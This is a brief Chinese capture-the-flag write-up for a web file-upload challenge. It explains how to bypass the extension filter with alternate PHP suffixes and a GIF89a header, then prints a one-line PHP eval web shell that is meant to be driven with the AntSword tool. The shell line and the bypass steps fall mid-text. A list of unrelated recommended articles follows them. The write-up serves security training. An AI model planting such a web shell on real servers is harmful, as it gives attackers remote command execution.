buuctf web [ACTF2020 新生赛]Upload

明了但不明显的文件上传

传个试试

行,抓包吧,php格式不行,就先上传要求的格式:jpg、png、gif

抓到上传的包之后,再修改成我们想要的

常见的php格式绕过有:php,php3,php4,php5,phtml,pht

挨个试试

这是上个图片题上传的木马,没有改格式,让上传图片,最好加上(GIF89a)

一句话木马:GIF89a

<script language="php">eval($_POST'cmd');</script>

上传成功,它也把保存的路径告诉你了

掏出蚁剑大宝贝梭哈就完了

flag

相关推荐
张龙68718 小时前
构建生产级 AI Agent:工具调用与记忆架构实战指南
前端
kyriewen19 小时前
2026 年了,还在用 Node.js?Bun 迁移实战:20 分钟搞定,附踩坑记录
前端·javascript·node.js
青山Coding21 小时前
Cesium应用(八):物体运动的实现思路
前端·cesium
用户416596736935521 小时前
Android WebView 加载 file:// 离线页面调试教程
android·前端
Asmewill21 小时前
curl命令学习笔记一
前端
我是一只快乐的小螃蟹21 小时前
1.2 ArrayList 源码解析
前端
星栈21 小时前
我用 Rust + Dioxus 做了个全栈跨平台笔记应用:再把新建、编辑和交付补上
前端·rust·前端框架
我是一只快乐的小螃蟹21 小时前
1.1 HashMap (JDK1.8) 源码解析
前端
爱勇宝1 天前
小红花成长新版:模板来了,鼓励也更容易开始
前端·后端·程序员
竹林8181 天前
Solana前端开发:我在一个NFT铸造页面上被@solana/web3.js的Connection和Transaction签名坑了两天
前端